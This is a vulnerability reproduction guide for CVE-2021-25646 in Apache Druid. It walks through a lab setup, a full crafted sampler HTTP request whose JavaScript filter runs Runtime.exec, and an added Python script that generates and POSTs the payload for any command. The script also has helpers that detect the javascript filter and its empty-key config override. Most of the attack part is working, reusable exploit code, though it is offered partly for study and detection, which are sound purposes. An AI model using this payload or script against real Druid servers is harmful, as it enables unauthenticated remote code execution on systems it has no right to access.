Apache Druid is a high-performance real-time analytics database: an engine for interactive, exploratory queries over large datasets, offered as an open-source analytical data store designed for OLAP.
Apache Druid 0.20.0 and earlier contain a remote code execution vulnerability (CVE-2021-25646). An authenticated attacker can send a specially crafted request that submits JavaScript code, and that code is then executed on the target system as arbitrary code. Note that Druid ships with no authentication configured, so on a default install such as the quickstart used below the request needs no credentials at all.

Setting up the Druid environment

Downloading Druid

The vulnerable version the official mirrors currently offer for download is 0.19.0; it can be fetched from https://mirrors.ustc.edu.cn/apache/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz.

Environment requirements

  • Linux, macOS or another Unix-like system
  • Java 8, update 92 or later (8u92+)
  • Java 11 also works, but Druid's Java version check has to be disabled

Running Druid

  1. Unpack apache-druid-0.19.0-bin.tar.gz

    tar xvfz apache-druid-0.19.0-bin.tar.gz

  2. If you are running Java 11, set the DRUID_SKIP_JAVA_CHECK environment variable to skip the Java version check

    export DRUID_SKIP_JAVA_CHECK=1

  3. Run bin/start-micro-quickstart

    ./bin/start-micro-quickstart

[screenshot: start-micro-quickstart running]

Reproducing the vulnerability

  1. Open hxxp://IP:8888, choose [Load data], [Local disk], then [Connect data]:

    [screenshot druid1]

  2. Enter quickstart/tutorial/ as the Base directory, then click [Apply] and [Next: Parse data]

    [screenshot druid2]

  3. Click [Filter], then [Add column filter]

    [screenshot druid3]

  4. Start your intercepting proxy, enter a filter value and click Apply

    [screenshot druid4]

  5. The captured request looks like this:

    [screenshot druid5]

    The part circled in red is the filter we just entered; it is also the injection point for the exploit.

  6. Edit the captured request: change the filter type to javascript and inject the malicious JS code (the filter object sits near the end of the body, in transformSpec):

    POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
    Host: XXXX:8888
    Connection: keep-alive
    Content-Length: 2830
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
    Content-Type: application/json;charset=UTF-8
    Origin: http://XXXX:8888
    Referer: http://XXXX:8888/unified-console.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7

    {"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{\"timestamp\":\"2018-01-01T07:01:35Z\",\"animal\":\"octopus\",\"number\":115}\n{\"timestamp\":\"2018-01-01T05:01:35Z\",\"animal\":\"mongoose\",\"number\":737}\n{\"timestamp\":\"2018-01-01T06:01:35Z\",\"animal\":\"snake\",\"number\":1234}\n{\"timestamp\":\"2018-01-01T01:01:35Z\",\"animal\":\"lion\",\"number\":300}\n{\"timestamp\":\"2018-01-01T01:01:35Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":20,\"bytes\":9024}\n{\"timestamp\":\"2018-01-01T01:01:51Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":255,\"bytes\":21133}\n{\"timestamp\":\"2018-01-01T01:01:59Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":11,\"bytes\":5780}\n{\"timestamp\":\"2018-01-01T01:02:14Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":38,\"bytes\":6289}\n{\"timestamp\":\"2018-01-01T01:02:29Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":377,\"bytes\":359971}\n{\"timestamp\":\"2018-01-01T01:03:29Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":49,\"bytes\":10204}\n{\"timestamp\":\"2018-01-02T21:33:14Z\",\"srcIP\":\"7.7.7.7\",\"dstIP\":\"8.8.8.8\",\"packets\":38,\"bytes\":6289}\n{\"timestamp\":\"2018-01-02T21:33:45Z\",\"srcIP\":\"7.7.7.7\",\"dstIP\":\"8.8.8.8\",\"packets\":123,\"bytes\":93999}\n{\"timestamp\":\"2018-01-02T21:35:45Z\",\"srcIP\":\"7.7.7.7\",\"dstIP\":\"8.8.8.8\",\"packets\":12,\"bytes\":2818}\n{\"timestamp\":\"2018-01-01T04:01:35Z\",\"animal\":\"bear\",\"number\":222}\n{\"timestamp\":\"2018-01-01T09:01:35Z\",\"animal\":\"falcon\",\"number\":1241}\n{\"timestamp\":\"2018-01-01T07:01:35Z\",\"animal\":\"octopus\",\"location\":1,\"number\":100}\n{\"timestamp\":\"2018-01-01T05:01:35Z\",\"animal\":\"mongoose\",\"location\":2,\"number\":200}\n{\"timestamp\":\"2018-01-01T06:01:35Z\",\"animal\":\"snake\",\"location\":3,\"number\":300}\n{\"timestamp\":\"2018-01-01T01:01:35Z\",\"animal\":\"lion\",\"location\":4,\"number\":300}\n{\"time\":\"2015-09-12T00:46:58.771Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"added project\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Talk\",\"page\":\"Talk:Oswald Tilghman\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"GELongstreet\",\"delta\":36,\"added\":36,\"deleted\":0}"},"inputFormat":{"type":"json","keepNullColumns":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('touch /tmp/cve_2021_25646_by_sayers')}", "": {"enabled": true}}}},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
  7. Send the modified request to Druid and check the host: the touch command injected through the JS code has been executed. The file is created by the Druid JVM that serviced the sampler request, so it is owned by the user Druid runs as:

    [screenshot druid7]
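As an added example (not code from the original write-up or from the Druid project), the following Python script builds the same sampler request that step 6 edits by hand, with the column filter replaced by a JavaScript filter, and inspects a captured request body for the two markers this technique leaves: a "type": "javascript" object anywhere in the spec, and the empty-string property carrying {"enabled": true}, which overrides the JavaScriptConfig that Druid injects into the filter server-side and is why the filter runs although druid.javascript.enabled is false by default. The host and port, the marker command and the two inline data rows are assumptions made here, not values from the page.

```python
"""Added example, not code from the original write-up or from the Druid project.

Builds the sampler request from step 6 (column filter swapped for a JavaScript
filter) and inspects a captured body for the markers of this technique.
Host/port, the marker command and the inline rows are assumptions made here.
"""
import json
import urllib.request
from typing import Any, Dict, List

# Constructed stand-in for the quickstart tutorial rows the console inlines.
SAMPLE_ROWS = [
    {"timestamp": "2018-01-01T07:01:35Z", "animal": "octopus", "number": 115},
    {"timestamp": "2018-01-01T05:01:35Z", "animal": "mongoose", "number": 737},
]
SAMPLER_PATH = "/druid/indexer/v1/sampler?for=filter"


def build_sampler_spec(command: str, rows: List[Dict[str, Any]] = SAMPLE_ROWS) -> Dict[str, Any]:
    """Index spec whose transformSpec filter is a JavaScript filter calling Runtime.exec.

    `command` is quoted with json.dumps so it is a valid JS string literal. The ""
    property with {"enabled": true} is the override seen in the captured payload:
    it replaces the injected JavaScriptConfig, so the filter runs even though
    druid.javascript.enabled is false by default.
    """
    js_function = "function(value) {java.lang.Runtime.getRuntime().exec(%s)}" % json.dumps(command)
    return {
        "type": "index",
        "spec": {
            "ioConfig": {
                "type": "index",
                "inputSource": {"type": "inline", "data": "\n".join(json.dumps(r) for r in rows)},
                "inputFormat": {"type": "json", "keepNullColumns": True},
            },
            "dataSchema": {
                "dataSource": "sample",
                "timestampSpec": {"column": "!!!_no_such_column_!!!", "missingValue": "1970-01-01T00:00:00Z"},
                "dimensionsSpec": {},
                "transformSpec": {
                    "transforms": [],
                    "filter": {"type": "javascript", "dimension": "number",
                               "function": js_function, "": {"enabled": True}},
                },
            },
            "tuningConfig": {"type": "index"},
        },
        "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
    }


def find_javascript_nodes(node: Any, path: str = "$") -> List[str]:
    """JSON paths of every object with "type": "javascript", walking the whole
    document so filters nested in and/or/not, extraction fns and aggregators are found."""
    hits: List[str] = []
    if isinstance(node, dict):
        if node.get("type") == "javascript":
            hits.append(path)
        for key, value in node.items():
            hits.extend(find_javascript_nodes(value, f"{path}.{key or '<empty>'}"))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            hits.extend(find_javascript_nodes(value, f"{path}[{index}]"))
    return hits


def has_config_override(node: Any) -> bool:
    """True if any object carries the "" key with an enabled:true config object."""
    if isinstance(node, dict):
        override = node.get("")
        if isinstance(override, dict) and override.get("enabled") is True:
            return True
        return any(has_config_override(v) for v in node.values())
    if isinstance(node, list):
        return any(has_config_override(v) for v in node)
    return False


def inspect_spec(doc: Dict[str, Any]) -> Dict[str, Any]:
    """Classify a parsed sampler/ingest body; either finding deserves an alert."""
    return {"javascript_nodes": find_javascript_nodes(doc), "config_override": has_config_override(doc)}


def send_sampler(host: str, spec: Dict[str, Any], timeout: float = 20.0) -> bytes:
    """POST the spec to the router's sampler endpoint of a lab instance you own."""
    request = urllib.request.Request(
        f"http://{host}{SAMPLER_PATH}",
        data=json.dumps(spec).encode("utf-8"),
        headers={"Content-Type": "application/json;charset=UTF-8"},
        method="POST",
    )
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return response.read()


if __name__ == "__main__":
    spec = build_sampler_spec("touch /tmp/cve_2021_25646_poc")  # assumed marker file
    print(json.dumps(inspect_spec(spec), indent=2))
    # send_sampler("127.0.0.1:8888", spec)  # only against a lab instance you own
```

Run it as-is to see the inspection report for the generated payload; send_sampler is left commented out and should only ever be pointed at your own lab instance. On the detection side, the sampler endpoint is also what the console uses for legitimate filter previews, so alert on the javascript type or the empty-key override rather than on the endpoint itself, and treat the setting druid.javascript.enabled=false as no protection on 0.20.0 and earlier, since the override works regardless of it; the real fix is upgrading past 0.20.0.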